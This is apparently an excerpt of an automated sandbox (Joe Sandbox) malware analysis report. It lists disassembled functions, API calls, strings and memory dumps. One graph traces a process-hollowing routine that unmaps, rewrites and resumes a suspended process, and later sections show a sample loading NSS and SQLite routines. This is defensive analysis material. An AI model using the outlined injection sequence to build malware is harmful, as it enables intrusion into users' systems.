                                                              • API ID: Clipboard$Global$CloseDataInfoOpenWindowWire
                                                              • String ID: @$A$C$F
                                                              • API String ID: 2111159801-319984173
                                                              APIs
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 0213D307
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 0213D334
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: EnvironmentExpandStrings
                                                              • String ID: K-K/$U5U7$\1B3
                                                              • API String ID: 237503144-1235027928
                                                              APIs
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 0213D307
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 0213D334
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: EnvironmentExpandStrings
                                                              • String ID: K-K/$U5U7$\1B3
                                                              • API String ID: 237503144-1235027928
                                                              APIs
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,00000000,?), ref: 0213DC71
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 0213DCA1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: EnvironmentExpandStrings
                                                              • String ID: eI.K$qs
                                                              • API String ID: 237503144-3936219367
                                                              APIs
                                                              Strings
                                                              • of system that leetspeak, reflection primarily the of other modified on glyphs resemblance is replacements similarity or eleet the ways used character a often spellings on play uses their via internet. or it in, xrefs: 02129145
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExitProcess
                                                              • String ID: of system that leetspeak, reflection primarily the of other modified on glyphs resemblance is replacements similarity or eleet the ways used character a often spellings on play uses their via internet. or it in
                                                              • API String ID: 621844428-2804141084
                                                              APIs
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000000,00000000,00000000,?), ref: 02133AEB
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000000,00000000,?,?), ref: 02133B1C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: EnvironmentExpandStrings
                                                              • String ID: V"
                                                              • API String ID: 237503144-2019076553
                                                              APIs
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000000,00000000,00000000,?), ref: 00413884
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000000,00000000,?,?), ref: 004138B5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID: EnvironmentExpandStrings
                                                              • String ID: V"
                                                              • API String ID: 237503144-2019076553
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: String
                                                              • String ID: /$_
                                                              • API String ID: 2568140703-3328996620
                                                              APIs
                                                              • SysStringLen.OLEAUT32 ref: 0042B93C
                                                                • Part of subcall function 00435440: RtlAllocateHeap.NTDLL(?,00000000,?), ref: 004354DD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeapString
                                                              • String ID: /$_
                                                              • API String ID: 983180023-3328996620
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: String
                                                              • String ID: /$_
                                                              • API String ID: 2568140703-3328996620
                                                              APIs
                                                              • SysStringLen.OLEAUT32 ref: 0042AA1D
                                                                • Part of subcall function 00435440: RtlAllocateHeap.NTDLL(?,00000000,?), ref: 004354DD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeapString
                                                              • String ID: /$_
                                                              • API String ID: 983180023-3328996620
                                                              APIs
                                                                • Part of subcall function 00435440: RtlAllocateHeap.NTDLL(?,00000000,?), ref: 004354DD
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,00000000,?), ref: 004222C9
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 004222FE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID: EnvironmentExpandStrings$AllocateHeap
                                                              • String ID: hi
                                                              • API String ID: 3432729115-3633523372
                                                              APIs
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,00000000,?), ref: 02142530
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 02142565
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: EnvironmentExpandStrings
                                                              • String ID: hi

                                                              Execution Graph

                                                              Execution Coverage:50.9%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:20.5%
                                                              Total number of Nodes:39
                                                              Total number of Limit Nodes:1
                                                              execution_graph 391 427b010 392 427b049 391->392 400 427b0e1 392->400 401 4279850 392->401 396 427b115 419 4279fb0 396->419 398 427b1a7 422 427a4f0 NtAllocateVirtualMemory 398->422 402 4279875 401->402 403 4279fb0 VirtualAlloc 402->403 405 427990f 403->405 404 4279921 404->396 413 4279b10 404->413 405->404 406 4279989 NtCreateFile 405->406 407 4279a2b 406->407 409 4279a34 406->409 408 4279a36 CreateFileMappingA 407->408 407->409 411 4279a94 MapViewOfFile 408->411 412 4279a64 408->412 409->404 410 4279abc FindCloseChangeNotification 409->410 410->404 411->409 412->409 412->411 414 4279b5e 413->414 415 4279b77 414->415 416 4279c2d NtProtectVirtualMemory 414->416 415->396 431 427a150 416->431 420 4279ff1 419->420 421 427a024 VirtualAlloc 420->421 421->398 423 427a580 422->423 424 427a6f7 GetTempFileNameA 423->424 433 4279c90 424->433 426 427a71b CreateFileA WriteFile 427 427a780 CreateProcessA NtUnmapViewOfSection VirtualAllocEx WriteProcessMemory 426->427 428 427a82a 427->428 429 427a88e Wow64GetThreadContext Wow64SetThreadContext ResumeThread ExitProcess 428->429 430 427a851 WriteProcessMemory 428->430 429->400 430->428 432 4279c5c NtProtectVirtualMemory 431->432 432->415 435 4279c95 433->435 436 427a0d0 437 4279fb0 VirtualAlloc 436->437 438 427a0dd 437->438

                                                              Callgraph

                                                              Control-flow Graph

                                                              APIs
                                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000004), ref: 0427A561
                                                              • GetTempFileNameA.KERNELBASE(?,kate,00000000,?), ref: 0427A714
                                                              • CreateFileA.KERNELBASE(?,00000003,00000000,00000000,00000004,00000002,00000000), ref: 0427A742
                                                              • WriteFile.KERNELBASE(00000000,?,000D7400,00000000,00000000), ref: 0427A76C
                                                              • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000000,00000000), ref: 0427A7B6
                                                              • NtUnmapViewOfSection.NTDLL(00000000,00400000), ref: 0427A7D0
                                                              • VirtualAllocEx.KERNELBASE(00000000,00400000,?,00003000,00000040), ref: 0427A7FB
                                                              • WriteProcessMemory.KERNELBASE(00000000,00400000,00000000,?,00000000), ref: 0427A81F
                                                              • WriteProcessMemory.KERNELBASE(00000000,00000000,00000000,00000000,00000000), ref: 0427A881
                                                              • Wow64GetThreadContext.KERNEL32(?,00010002), ref: 0427A8AF
                                                              • Wow64SetThreadContext.KERNEL32(?,00010002), ref: 0427A8DA
                                                              • ResumeThread.KERNELBASE(?), ref: 0427A8EC
                                                              • ExitProcess.KERNEL32(00000000), ref: 0427A8F9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.2056003216.0000000004279000.00000040.00001000.00020000.00000000.sdmp, Offset: 04279000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_4279000_EE6.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Process$FileMemoryThreadWrite$ContextCreateVirtualWow64$AllocAllocateExitNameResumeSectionTempUnmapView
                                                              • String ID: kate

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 04279FB0: VirtualAlloc.KERNELBASE(00000000,0427990F,00003000,00000040), ref: 0427A034
                                                              • NtCreateFile.NTDLL(00000000,00120089,00000018,?,00000000,00000080,00000001,00000001,00000040,00000000,00000000), ref: 04279A1B
                                                              • FindCloseChangeNotification.KERNELBASE(00000000), ref: 04279ACC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.2056003216.0000000004279000.00000040.00001000.00020000.00000000.sdmp, Offset: 04279000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_4279000_EE6.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocChangeCloseCreateFileFindNotificationVirtual
                                                              • String ID: @

                                                              Control-flow Graph

                                                              control_flow_graph 59 4279b10-4279b75 call 4279740 62 4279b77-4279b79 59->62 63 4279b7e-4279b93 59->63 64 4279c81-4279c84 62->64 65 4279b95-4279b97 63->65 66 4279b9c-4279bb4 63->66 65->64 67 4279bbf-4279bc9 66->67 68 4279c17-4279c1b 67->68 69 4279bcb-4279bdb 67->69 70 4279c1d-4279c21 68->70 71 4279c29-4279c2b 68->71 72 4279c15 69->72 73 4279bdd-4279c13 69->73 70->71 74 4279c23-4279c27 70->74 71->64 72->67 73->68 74->71 76 4279c2d-4279c7c NtProtectVirtualMemory call 427a150 NtProtectVirtualMemory 74->76 76->64
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.2056003216.0000000004279000.00000040.00001000.00020000.00000000.sdmp, Offset: 04279000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_4279000_EE6.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .tex

                                                              Control-flow Graph

                                                              APIs
                                                              • VirtualAlloc.KERNELBASE(00000000,0427990F,00003000,00000040), ref: 0427A034
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.2056003216.0000000004279000.00000040.00001000.00020000.00000000.sdmp, Offset: 04279000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_4279000_EE6.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID: VirtualAlloc
                                                              APIs
                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6D137C33
                                                              • NSS_OptionGet.NSS3(0000000C,00000000), ref: 6D137C66
                                                              • CERT_DestroyCertificate.NSS3(00000000), ref: 6D137D1E
                                                                • Part of subcall function 6D137870: SECOID_FindOID_Util.NSS3(?,?,?,6D1391C5), ref: 6D13788F
                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6D137D48
                                                              • PR_SetError.NSS3(FFFFE067,00000000), ref: 6D137D71
                                                              • SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6D137DD3
                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6D137DE1
                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6D137DF8
                                                              • SECKEY_DestroyPublicKey.NSS3(?), ref: 6D137E1A
                                                              • PR_SetError.NSS3(FFFFE067,00000000), ref: 6D137E58
                                                                • Part of subcall function 6D137870: PR_SetError.NSS3(FFFFE005,00000000,?,?,6D1391C5), ref: 6D1378BB
                                                                • Part of subcall function 6D137870: PORT_ZAlloc_Util.NSS3(0000000C,?,?,?,6D1391C5), ref: 6D1378FA
                                                                • Part of subcall function 6D137870: strchr.VCRUNTIME140(?,0000003A,?,?,?,?,?,?,?,?,?,?,6D1391C5), ref: 6D137930
                                                                • Part of subcall function 6D137870: PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6D1391C5), ref: 6D137951
                                                                • Part of subcall function 6D137870: memcpy.VCRUNTIME140(00000000,?,?), ref: 6D137964
                                                                • Part of subcall function 6D137870: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6D13797A
                                                                • Part of subcall function 6D137870: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 6D137988
                                                                • Part of subcall function 6D137870: memcpy.VCRUNTIME140(?,00000001,00000001), ref: 6D137998
                                                                • Part of subcall function 6D137870: free.MOZGLUE(00000000), ref: 6D1379A7
                                                                • Part of subcall function 6D137870: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,6D1391C5), ref: 6D1379BB
                                                                • Part of subcall function 6D137870: PR_GetCurrentThread.NSS3(?,?,?,?,6D1391C5), ref: 6D1379CA
                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6D137E49
                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6D137F8C
                                                              • SECKEY_DestroyPublicKey.NSS3(?), ref: 6D137F98
                                                              • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6D137FBF
                                                              • SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6D137FD9
                                                              • PK11_ImportEncryptedPrivateKeyInfoAndReturnKey.NSS3(?,00000000,?,?,?,00000001,00000001,?,?,00000000,?), ref: 6D138038
                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6D138050
                                                              • PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6D138093
                                                              • SECOID_FindOID_Util.NSS3 ref: 6D137F29
                                                                • Part of subcall function 6D1307B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6D0D8298,?,?,?,6D0CFCE5,?), ref: 6D1307BF
                                                                • Part of subcall function 6D1307B0: PL_HashTableLookup.NSS3(?,?), ref: 6D1307E6
                                                                • Part of subcall function 6D1307B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6D13081B
                                                                • Part of subcall function 6D1307B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6D130825
                                                              • SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6D138072
                                                              • SECOID_FindOID_Util.NSS3 ref: 6D1380F5
                                                                • Part of subcall function 6D13BC10: SECITEM_CopyItem_Util.NSS3(?,?,?,?,-00000001,?,6D13800A,00000000,?,00000000,?), ref: 6D13BC3F
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Util$Item_$Error$Zfree$DestroyPublic$Find$Alloc_CopyHashImportK11_LookupTablememcpy$AlgorithmCertificateConstCurrentEncryptedInfoOptionPrivateReturnTag_Threadfreestrchrstrcmpstrlen
                                                              • String ID:
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32 ref: 6D0C1C6B
                                                              • OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 6D0C1C75
                                                              • GetTokenInformation.ADVAPI32(00000400,00000004,?,00000400,?), ref: 6D0C1CA1
                                                              • GetLengthSid.ADVAPI32(?), ref: 6D0C1CA9
                                                              • malloc.MOZGLUE(00000000), ref: 6D0C1CB4
                                                              • CopySid.ADVAPI32(00000000,00000000,?), ref: 6D0C1CCC
                                                              • GetTokenInformation.ADVAPI32(?,00000005(TokenIntegrityLevel),?,00000400,?), ref: 6D0C1CE4
                                                              • GetLengthSid.ADVAPI32(?), ref: 6D0C1CEC
                                                              • malloc.MOZGLUE(00000000), ref: 6D0C1CFD
                                                              • CopySid.ADVAPI32(00000000,00000000,?), ref: 6D0C1D0F
                                                              • CloseHandle.KERNEL32(?), ref: 6D0C1D17
                                                              • AllocateAndInitializeSid.ADVAPI32 ref: 6D0C1D4D
                                                              • GetLastError.KERNEL32 ref: 6D0C1D73
                                                              • PR_LogPrint.NSS3(_PR_NT_InitSids: OpenProcessToken() failed. Error: %d,00000000), ref: 6D0C1D7F
                                                              Strings
                                                              • _PR_NT_InitSids: OpenProcessToken() failed. Error: %d, xrefs: 6D0C1D7A
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Token$CopyInformationLengthProcessmalloc$AllocateCloseCurrentErrorHandleInitializeLastOpenPrint
                                                              • String ID: _PR_NT_InitSids: OpenProcessToken() failed. Error: %d
                                                              APIs
                                                              • __aulldiv.LIBCMT ref: 6D0C3DFB
                                                              • __allrem.LIBCMT ref: 6D0C3EEC
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D0C3FA3
                                                              • memcpy.VCRUNTIME140(?,?,00000001), ref: 6D0C4047
                                                              • memcpy.VCRUNTIME140(?,?,00000000), ref: 6D0C40DE
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D0C415F
                                                              • __allrem.LIBCMT ref: 6D0C416B
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D0C4288
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D0C42AB
                                                              • __allrem.LIBCMT ref: 6D0C42B7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__allrem$memcpy$__aulldiv
                                                              • String ID: %02d$%03d$%04d$%lld
                                                              APIs
                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6D071D58
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D071EFD
                                                              • sqlite3_exec.NSS3(00000000,00000000,Function_00007370,?,00000000), ref: 6D071FB7
                                                              Strings
                                                              • attached databases must use the same text encoding as main database, xrefs: 6D0720CA
                                                              • abort due to ROLLBACK, xrefs: 6D072223
                                                              • sqlite_temp_master, xrefs: 6D071C5C
                                                              • unknown error, xrefs: 6D072291
                                                              • another row available, xrefs: 6D072287
                                                              • unsupported file format, xrefs: 6D072188
                                                              • table, xrefs: 6D071C8B
                                                              • SELECT*FROM"%w".%s ORDER BY rowid, xrefs: 6D071F83
                                                              • no more rows available, xrefs: 6D072264
                                                              • sqlite_master, xrefs: 6D071C61
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_byteswap_ulongsqlite3_exec
                                                              • String ID: SELECT*FROM"%w".%s ORDER BY rowid$abort due to ROLLBACK$another row available$attached databases must use the same text encoding as main database$no more rows available$sqlite_master$sqlite_temp_master$table$unknown error$unsupported file format
                                                              • API String ID: 563213449-2102270813
                                                              • Opcode ID: ef451bc67041056ccd65de98bacc6e59943c9667119091e7109c4ae664fc2a2c
                                                              • Instruction ID: 281f7f503def9c25e07e53a4b90153aebcd4502a9555c2bbd3226d40c4794b53
                                                              • Opcode Fuzzy Hash: ef451bc67041056ccd65de98bacc6e59943c9667119091e7109c4ae664fc2a2c
                                                              • Instruction Fuzzy Hash: 9A12BD70A083429FE725CF28C49072AB7F2BF89314F55846DE9998F352D331E846CB96
                                                              APIs
                                                              • PK11_HPKE_NewContext.NSS3(?,?,?,00000000,00000000), ref: 6D0FFD06
                                                                • Part of subcall function 6D0FF670: PORT_ZAlloc_Util.NSS3(00000038), ref: 6D0FF696
                                                                • Part of subcall function 6D0FF670: PK11_FreeSymKey.NSS3(?,?,?), ref: 6D0FF789
                                                                • Part of subcall function 6D0FF670: SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?), ref: 6D0FF796
                                                                • Part of subcall function 6D0FF670: free.MOZGLUE(00000000,?,?,?,?,?), ref: 6D0FF79F
                                                                • Part of subcall function 6D0FF670: SECITEM_DupItem_Util.NSS3 ref: 6D0FF7F0
                                                                • Part of subcall function 6D123440: PK11_GetAllTokens.NSS3 ref: 6D123481
                                                                • Part of subcall function 6D123440: PR_SetError.NSS3(00000000,00000000), ref: 6D1234A3
                                                                • Part of subcall function 6D123440: TlsGetValue.KERNEL32 ref: 6D12352E
                                                                • Part of subcall function 6D123440: EnterCriticalSection.KERNEL32(?), ref: 6D123542
                                                                • Part of subcall function 6D123440: PR_Unlock.NSS3(?), ref: 6D12355B
                                                              • SECITEM_DupItem_Util.NSS3(?), ref: 6D0FFDAD
                                                                • Part of subcall function 6D12FD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6D0D9003,?), ref: 6D12FD91
                                                                • Part of subcall function 6D12FD80: PORT_Alloc_Util.NSS3(A4686D13,?), ref: 6D12FDA2
                                                                • Part of subcall function 6D12FD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686D13,?,?), ref: 6D12FDC4
                                                              • SECITEM_DupItem_Util.NSS3(?), ref: 6D0FFE00
                                                                • Part of subcall function 6D12FD80: free.MOZGLUE(00000000,?,?), ref: 6D12FDD1
                                                                • Part of subcall function 6D11E550: PR_SetError.NSS3(FFFFE005,00000000), ref: 6D11E5A0
                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6D0FFEBB
                                                              • PK11_FreeSymKey.NSS3(00000000), ref: 6D0FFEC8
                                                              • PK11_HPKE_DestroyContext.NSS3(00000000,00000001), ref: 6D0FFED3
                                                              • PR_SetError.NSS3(FFFFE002,00000000), ref: 6D0FFF0C
                                                              • PR_SetError.NSS3(FFFFE002,00000000), ref: 6D0FFF23
                                                              • PK11_ImportSymKey.NSS3(?,?,00000004,82000105,?,00000000), ref: 6D0FFF4D
                                                              • PR_SetError.NSS3(FFFFE002,00000000), ref: 6D0FFFDA
                                                              • PK11_ImportSymKey.NSS3(?,0000402A,00000004,0000010C,?,00000000), ref: 6D100007
                                                              • PK11_CreateContextBySymKey.NSS3(?,82000105,?,?), ref: 6D100029
                                                              • PR_SetError.NSS3(FFFFE002,00000000), ref: 6D100044
                                                              Similarity
                                                              • API ID: K11_$ErrorUtil$Item_$Alloc_Context$FreeImportfree$CreateCriticalDestroyEnterSectionTokensUnlockValueZfreememcpy
                                                              • String ID:
                                                              • API String ID: 138705723-0
                                                              • Opcode ID: 18b2b628431f8aa0803740a6b9c848272191df57603e288b08ca9d68ca3f22f7
                                                              • Instruction ID: 4c3d9b1a68a524b1a25f4955871c4b5a5a90737c3addbd38acddacf5dbb8eda9
                                                              • Opcode Fuzzy Hash: 18b2b628431f8aa0803740a6b9c848272191df57603e288b08ca9d68ca3f22f7
                                                              • Instruction Fuzzy Hash: 6CB193715042029FE714CF29C880B3AFBE9FF88308F658A2DE999D7251E770E949CB51
                                                              APIs
                                                              • SECOID_FindOID_Util.NSS3(?), ref: 6D0F7DDC
                                                                • Part of subcall function 6D1307B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6D0D8298,?,?,?,6D0CFCE5,?), ref: 6D1307BF
                                                                • Part of subcall function 6D1307B0: PL_HashTableLookup.NSS3(?,?), ref: 6D1307E6
                                                                • Part of subcall function 6D1307B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6D13081B
